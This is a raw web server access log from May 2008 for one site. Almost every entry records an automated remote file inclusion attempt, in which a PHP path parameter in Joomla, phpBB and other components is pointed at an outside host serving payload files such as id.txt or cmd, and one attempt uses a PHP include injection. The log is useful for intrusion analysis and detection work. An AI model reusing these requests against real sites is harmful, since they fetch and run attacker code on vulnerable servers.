196.38.88.68 - - [16/May/2008:09:47:59 -0700] "GET /logs/access.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:09:48:45 -0700] "GET /logs/access.log/(administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=)http://www.campuswatch.net/calendar//tools/albo/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:09:48:45 -0700] "GET /(administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=)http://www.campuswatch.net/calendar//tools/albo/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:09:48:45 -0700] "GET /logs/(administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=)http://www.campuswatch.net/calendar//tools/albo/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.92.87.157 - - [16/May/2008:09:48:45 -0700] "GET /logs/access_080126.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
204.92.87.157 - - [16/May/2008:09:48:45 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
80.249.116.11 - - [16/May/2008:09:48:45 -0700] "GET /logs/access_071218.log/modules/EN-Forums/db/mysql.php?phpbb_root_path=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
204.92.87.157 - - [16/May/2008:09:48:45 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
80.249.116.11 - - [16/May/2008:09:48:46 -0700] "GET /modules/EN-Forums/db/mysql.php?phpbb_root_path=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.249.116.11 - - [16/May/2008:09:48:46 -0700] "GET /logs/modules/EN-Forums/db/mysql.php?phpbb_root_path=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
204.92.87.157 - - [16/May/2008:09:48:50 -0700] "GET /logs/access_080226.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.116.44.60 - - [16/May/2008:09:48:51 -0700] "GET /logs/access_080327.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://lab.matrixl.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.95.82.113 - - [16/May/2008:09:48:58 -0700] "GET /logs/access_080306.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.95.82.113 - - [16/May/2008:09:48:58 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.95.82.113 - - [16/May/2008:09:48:59 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.114.222.208 - - [16/May/2008:09:49:07 -0700] "GET /logs/access_071116.log/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://free.7host07.com/homebeauty/Allen.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.114.222.208 - - [16/May/2008:09:49:07 -0700] "GET /include/inc_ext/spaw/dialogs/table.php?spaw_root=http://free.7host07.com/homebeauty/Allen.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.114.222.208 - - [16/May/2008:09:49:08 -0700] "GET /logs/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://free.7host07.com/homebeauty/Allen.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.114.222.208 - - [16/May/2008:09:49:16 -0700] "GET /logs/access_071116.log/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://free.7host07.com/homebeauty/Allen.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.114.222.208 - - [16/May/2008:09:49:16 -0700] "GET /include/inc_ext/spaw/dialogs/table.php?spaw_root=http://free.7host07.com/homebeauty/Allen.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.114.222.208 - - [16/May/2008:09:49:17 -0700] "GET /logs/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://free.7host07.com/homebeauty/Allen.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.114.222.208 - - [16/May/2008:09:49:18 -0700] "GET /logs/access_071116.log/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://free.7host07.com/homebeauty/Allen.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.114.222.208 - - [16/May/2008:09:49:19 -0700] "GET /include/inc_ext/spaw/dialogs/table.php?spaw_root=http://free.7host07.com/homebeauty/Allen.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.114.222.208 - - [16/May/2008:09:49:19 -0700] "GET /logs/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://free.7host07.com/homebeauty/Allen.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
222.236.47.176 - - [16/May/2008:09:49:29 -0700] "GET /logs/access_071212.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.47.176 - - [16/May/2008:09:49:29 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.47.176 - - [16/May/2008:09:49:30 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.114.222.208 - - [16/May/2008:09:49:56 -0700] "GET /logs/access_080106.log/modules/vwar/admin/admin.php?vwar_root=http://free.7host07.com/homebeauty/Allen.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.114.222.208 - - [16/May/2008:09:49:57 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=http://free.7host07.com/homebeauty/Allen.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.114.222.208 - - [16/May/2008:09:49:57 -0700] "GET /logs/modules/vwar/admin/admin.php?vwar_root=http://free.7host07.com/homebeauty/Allen.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.114.222.208 - - [16/May/2008:09:49:58 -0700] "GET /logs/access_080106.log/modules/vwar/admin/admin.php?vwar_root=http://free.7host07.com/homebeauty/Allen.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.114.222.208 - - [16/May/2008:09:49:59 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=http://free.7host07.com/homebeauty/Allen.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.114.222.208 - - [16/May/2008:09:49:59 -0700] "GET /logs/modules/vwar/admin/admin.php?vwar_root=http://free.7host07.com/homebeauty/Allen.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.114.222.208 - - [16/May/2008:09:50:03 -0700] "GET /logs/access_080106.log/modules/vwar/admin/admin.php?vwar_root=http://free.7host07.com/homebeauty/Allen.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.114.222.208 - - [16/May/2008:09:50:03 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=http://free.7host07.com/homebeauty/Allen.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.114.222.208 - - [16/May/2008:09:50:04 -0700] "GET /logs/modules/vwar/admin/admin.php?vwar_root=http://free.7host07.com/homebeauty/Allen.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
222.236.47.176 - - [16/May/2008:09:50:04 -0700] "GET /logs/access_080210.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.47.176 - - [16/May/2008:09:50:04 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.47.176 - - [16/May/2008:09:50:05 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.249.116.11 - - [16/May/2008:09:50:09 -0700] "GET /logs/access_071218.log/modules/EN-Forums/db/mysql.php?phpbb_root_path=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.249.116.11 - - [16/May/2008:09:50:09 -0700] "GET /modules/EN-Forums/db/mysql.php?phpbb_root_path=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.249.116.11 - - [16/May/2008:09:50:10 -0700] "GET /logs/modules/EN-Forums/db/mysql.php?phpbb_root_path=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.249.116.11 - - [16/May/2008:09:50:32 -0700] "GET /logs/access_071218.log//modules/EN-Forums/db/mysql.php?phpbb_root_path=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.249.116.11 - - [16/May/2008:09:50:33 -0700] "GET //modules/EN-Forums/db/mysql.php?phpbb_root_path=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.249.116.11 - - [16/May/2008:09:50:33 -0700] "GET /logs//modules/EN-Forums/db/mysql.php?phpbb_root_path=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
119.63.193.186 - - [16/May/2008:09:50:38 -0700] "GET /retreat1/webcam/retreat1_00547.jpg HTTP/1.1" 200 15808 "-" "BaiduImagespider+(+http://www.baidu.jp/search/s308.html)" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:09:50:46 -0700] "GET /logs/access_080201.log/(administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=)http://www.fccmartinsferry.org/trans//tools/images/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.47.176 - - [16/May/2008:09:51:00 -0700] "GET /logs/access_071116.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.90.72.88 - - [16/May/2008:09:51:06 -0700] "GET /logs/index.php?incl=http://welfare.skku.edu/bbs/files/id6.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.90.72.88 - - [16/May/2008:09:51:10 -0700] "GET /index.php?incl=http://welfare.skku.edu/bbs/files/id6.gif?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
196.38.88.68 - - [16/May/2008:09:51:18 -0700] "GET /logs/access_080221.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:09:51:29 -0700] "GET /logs/access_071225.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.campuswatch.net/calendar//tools/albo/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:09:51:29 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.campuswatch.net/calendar//tools/albo/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:09:51:29 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.campuswatch.net/calendar//tools/albo/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.47.176 - - [16/May/2008:09:51:31 -0700] "GET /logs/access_080126.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:09:51:35 -0700] "GET /logs/access_080201.log/(administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=)http://www.campuswatch.net/calendar//tools/albo/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.7.108.240 - - [16/May/2008:09:51:49 -0700] "GET /logs/index.php?incl=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.7.108.240 - - [16/May/2008:09:51:50 -0700] "GET /index.php?incl=http://www.segredodoslivros.com/images/images? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
210.114.222.208 - - [16/May/2008:09:52:02 -0700] "GET /logs/access_080112.log/modules/vwar/admin/admin.php?vwar_root=http://free.7host07.com/homebeauty/Allen.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.114.222.208 - - [16/May/2008:09:52:03 -0700] "GET /logs/access_080112.log/modules/vwar/admin/admin.php?vwar_root=http://free.7host07.com/homebeauty/Allen.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.114.222.208 - - [16/May/2008:09:52:03 -0700] "GET /logs/access_080112.log/modules/vwar/admin/admin.php?vwar_root=http://free.7host07.com/homebeauty/Allen.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
194.177.96.168 - - [16/May/2008:09:52:06 -0700] "GET /logs/access_080128.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.peccu.org/components/com_extcalendar/upload/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.71.36.82 - - [16/May/2008:09:52:20 -0700] "GET /logs/index.php?/?mosConfig_absolute_path=http://www.dito.nl/php_content/.htaccess_/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
80.71.36.82 - - [16/May/2008:09:52:21 -0700] "GET /index.php?/?mosConfig_absolute_path=http://www.dito.nl/php_content/.htaccess_/test.txt?? HTTP/1.1" 200 11606 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
160.99.12.231 - - [16/May/2008:09:52:22 -0700] "GET /main.php?pagina=http://83.222.131.90/~legitimi/mybase/cmd?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
160.99.12.231 - - [16/May/2008:09:52:22 -0700] "GET /logs/main.php?pagina=http://83.222.131.90/~legitimi/mybase/cmd?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:09:52:41 -0700] "GET /logs/access_080309.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.fccmartinsferry.org/trans//tools/images/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:09:52:41 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.fccmartinsferry.org/trans//tools/images/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:09:52:42 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.fccmartinsferry.org/trans//tools/images/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.30.216.59 - - [16/May/2008:09:52:59 -0700] "GET /logs/access_080201.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
210.114.222.208 - - [16/May/2008:09:53:05 -0700] "GET /logs/access_071210.log/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://free.7host07.com/homebeauty/Allen.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.114.222.208 - - [16/May/2008:09:53:05 -0700] "GET /logs/access_071210.log/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://free.7host07.com/homebeauty/Allen.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
119.63.193.186 - - [16/May/2008:09:53:08 -0700] "GET /retreat1/webcam/retreat1_00552.jpg HTTP/1.1" 200 16129 "-" "BaiduImagespider+(+http://www.baidu.jp/search/s308.html)" "www.dmulk.com"
210.114.222.208 - - [16/May/2008:09:53:09 -0700] "GET /logs/access_071210.log/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://free.7host07.com/homebeauty/Allen.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:09:53:52 -0700] "GET /logs/access_080313.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.fccmartinsferry.org/trans//tools/images/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.225.217.194 - - [16/May/2008:09:54:23 -0700] "GET /logs/index.php?incl=http://cocreation.hk/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.225.217.194 - - [16/May/2008:09:54:29 -0700] "GET /index.php?incl=http://cocreation.hk/id? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
151.11.24.250 - - [16/May/2008:09:54:36 -0700] "GET /logs/home.php?pagina=http://www.cdvmbienesraices.com.mx/images/html_f2.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [16/May/2008:09:54:37 -0700] "GET /home.php?pagina=http://www.cdvmbienesraices.com.mx/images/html_f2.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.51.45 - - [16/May/2008:09:54:55 -0700] "GET /logs/index.php?incl=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [16/May/2008:09:55:01 -0700] "GET /index.php?incl=http://www.segredodoslivros.com/images/images? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
208.100.3.19 - - [16/May/2008:09:55:31 -0700] "GET /logs/home.php?pagina=http://www.cdvmbienesraices.com.mx/images/html_f2.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.100.3.19 - - [16/May/2008:09:55:31 -0700] "GET /home.php?pagina=http://www.cdvmbienesraices.com.mx/images/html_f2.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.113.24.150 - - [16/May/2008:09:56:09 -0700] "GET /logs/access_080328.log/main.php?x=http://200.169.80.9/log/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
196.38.88.68 - - [16/May/2008:09:56:23 -0700] "GET /logs/access.log/index.php?page=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
196.38.88.68 - - [16/May/2008:09:56:29 -0700] "GET /logs/index.php?page=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
196.38.88.68 - - [16/May/2008:09:56:29 -0700] "GET /index.php?page=http://azur-animation.com/img/echo.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.808" "www.dmulk.com"
212.113.24.150 - - [16/May/2008:09:56:53 -0700] "GET /logs/access_080326.log/main.php?x=http://200.169.80.9/log/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
204.92.87.157 - - [16/May/2008:09:57:09 -0700] "GET /logs//administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
204.92.87.157 - - [16/May/2008:09:57:09 -0700] "GET //administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
160.99.12.231 - - [16/May/2008:09:57:35 -0700] "GET //ecommerce/payment/cybersource.php?path[docroot]=http://83.222.131.90/~legitimi/mybase/cmd?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
160.99.12.231 - - [16/May/2008:09:57:40 -0700] "GET /logs//ecommerce/payment/cybersource.php?path[docroot]=http://83.222.131.90/~legitimi/mybase/cmd?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
67.205.85.232 - - [16/May/2008:09:58:42 -0700] "GET /logs/access.log/errors.php?error=http://www.villa-bizarro.nl/css/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:09:58:42 -0700] "GET /logs/access_080201.log/index.php?pagina=http://www.campuswatch.net/calendar//tools/albo/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.205.85.232 - - [16/May/2008:09:58:42 -0700] "GET /errors.php?error=http://www.villa-bizarro.nl/css/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.205.85.232 - - [16/May/2008:09:58:43 -0700] "GET /logs/errors.php?error=http://www.villa-bizarro.nl/css/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:09:58:47 -0700] "GET /logs/index.php?pagina=http://www.campuswatch.net/calendar//tools/albo/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:09:58:48 -0700] "GET /index.php?pagina=http://www.campuswatch.net/calendar//tools/albo/alba.txt????? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:09:58:58 -0700] "GET /logs/access_080201.log/index.php?pagina=http://www.campuswatch.net/calendar//tools/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.182.98 - - [16/May/2008:09:59:00 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.zimbaligolfestate.co.za/administrator/templates/mambo??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
70.84.182.98 - - [16/May/2008:09:59:00 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://www.zimbaligolfestate.co.za/administrator/templates/mambo??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:09:59:03 -0700] "GET /logs/index.php?pagina=http://www.campuswatch.net/calendar//tools/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:09:59:03 -0700] "GET /index.php?pagina=http://www.campuswatch.net/calendar//tools/albo/id.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
69.90.72.88 - - [16/May/2008:09:59:46 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://welfare.skku.edu/bbs/files/id6.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.90.72.88 - - [16/May/2008:09:59:46 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://welfare.skku.edu/bbs/files/id6.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:09:59:46 -0700] "GET /logs/access_071224.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.campuswatch.net/calendar//tools/albo/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
196.38.88.68 - - [16/May/2008:09:59:57 -0700] "GET /logs/access_071226.log/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
196.38.88.68 - - [16/May/2008:09:59:58 -0700] "GET /components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
196.38.88.68 - - [16/May/2008:09:59:59 -0700] "GET /logs/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.169.182.59 - - [16/May/2008:10:00:54 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
81.169.182.59 - - [16/May/2008:10:00:55 -0700] "GET /logs/access_080201.log/errors.php?error=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
81.169.182.59 - - [16/May/2008:10:00:55 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
81.169.182.59 - - [16/May/2008:10:00:55 -0700] "GET /errors.php?error=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
81.169.182.59 - - [16/May/2008:10:00:56 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
81.169.182.59 - - [16/May/2008:10:00:56 -0700] "GET /logs/errors.php?error=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
81.169.182.59 - - [16/May/2008:10:00:56 -0700] "GET /logs/access_080220.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
